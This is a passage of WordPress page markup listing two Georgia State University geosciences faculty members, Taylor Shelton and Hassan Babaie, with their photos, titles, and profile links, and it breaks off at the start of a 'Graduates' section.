h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\" class=\"wp-image-1681 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\" class=\"wp-image-1682 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 